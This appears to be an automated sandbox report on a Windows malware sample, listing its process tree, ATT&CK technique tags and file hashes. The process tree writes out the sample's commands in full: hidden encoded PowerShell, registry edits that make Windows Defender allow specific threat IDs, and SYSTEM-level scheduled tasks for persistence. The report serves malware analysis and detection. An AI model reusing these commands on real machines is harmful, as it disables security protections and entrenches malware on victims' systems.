C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:13540
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:8788
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\mYFJKsFS\bflHSrF.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\mYFJKsFS\bflHSrF.exe U4 /S1⤵PID:5424
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:9984
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:15400
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:13096
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\kHLfCUP.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\kHLfCUP.exe nh /site_id 754 /S1⤵PID:10420
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"2⤵PID:12156
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:13868
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3884
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3048
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:14496
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:10108
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:7040
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:18220
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:12204
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4108
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4248
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:18152
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:13172
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:8256
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:7752
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
- Drops file in Drivers directory
PID:9336 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:9928
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:10128
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:17080
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:12696
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:11024
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:7220
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cbBtQoNpOByPPTwrn" /SC once /ST 08:20:15 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\DkMquET.exe\" V8 /site_id 754 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:5360 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "cbBtQoNpOByPPTwrn"2⤵PID:10024
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:16616
-
C:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\DkMquET.exeC:\Windows\Temp\ZKIEJJPSRIlthXTT\afNVUzxISkNEpud\DkMquET.exe V8 /site_id 754 /S1⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:10080 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bWIRRaDZCpCYZHZEtf"2⤵PID:10172
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:10296
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:17780
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:11792
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1312
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JDaUpqLWU\XuejMY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qTJPyBJZsADsDDd" /V1 /F2⤵PID:2032
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qTJPyBJZsADsDDd2" /F /xml "C:\Program Files (x86)\JDaUpqLWU\mXJvmcA.xml" /RU "SYSTEM"2⤵PID:15252
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qTJPyBJZsADsDDd"2⤵PID:7672
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qTJPyBJZsADsDDd"2⤵PID:9468
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LMVWktnylhEgic" /F /xml "C:\Program Files (x86)\CzJsMnpmYIHU2\oNukbRm.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:11308 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LmWwWbygFrIYQ2" /F /xml "C:\ProgramData\pJxacTbbSlizmPVB\Vqrfkcr.xml" /RU "SYSTEM"2⤵PID:7184
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kIaWWMRbvXNLsrwhO2" /F /xml "C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\oLCZTNH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:13112 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ChSiuBhrWLQfWhgdkuF2" /F /xml "C:\Program Files (x86)\MCoLVEAxuDhpC\dLuJRzq.xml" /RU "SYSTEM"2⤵PID:9572
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuVWGEijggM" /SC once /ST 13:09:58 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\SQQupNTt\jvbxilu.exe\" U4 /S"2⤵PID:2864
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuVWGEijggM"2⤵PID:14100
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\SQQupNTt\jvbxilu.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\SQQupNTt\jvbxilu.exe U4 /S1⤵PID:11872
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5768
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4712
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:12520
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7760
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4808
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:13252
-
C:\Windows\system32\WerFault.exe"C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20210318-1613.dm1⤵PID:14764
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:11180
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:5468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:10256
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:14040
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:16420
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6428
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\Gawfomy.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\Gawfomy.exe nh /site_id 754 /S1⤵PID:7852
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"2⤵PID:11516
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:12500
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:17884
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:15484
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:16604
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:8276
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:5344
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:16468
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:7268
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:14464
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:17556
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:6664
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:6532
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:12592
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:10456
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:11452
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1180
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4236
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:13180
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4348
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5160
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7912
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8880
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Impair Defenses
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
2Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
7233b5ee012fa5b15872a17cec85c893
SHA11cddbafd69e119ec5ab5c489420d4c74a523157b
SHA25646a209c1f32c304a878395b6df5b2e306fd6eea0db40f0bab0a6d71eeb6b8628
SHA512716ff0dfd097e178d1023fe9e65720bc36b94d291811211a57193df7605616db1752dabaf5637a361c9996510242a71fc58d173605e251d733ae6431da9a1b4f
-
MD5
7233b5ee012fa5b15872a17cec85c893
SHA11cddbafd69e119ec5ab5c489420d4c74a523157b
SHA25646a209c1f32c304a878395b6df5b2e306fd6eea0db40f0bab0a6d71eeb6b8628
SHA512716ff0dfd097e178d1023fe9e65720bc36b94d291811211a57193df7605616db1752dabaf5637a361c9996510242a71fc58d173605e251d733ae6431da9a1b4f
-
MD5
ef2834ac4ee7d6724f255beaf527e635
SHA15be8c1e73a21b49f353c2ecfa4108e43a883cb7b
SHA256a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba
SHA512c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2
-
MD5
8f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
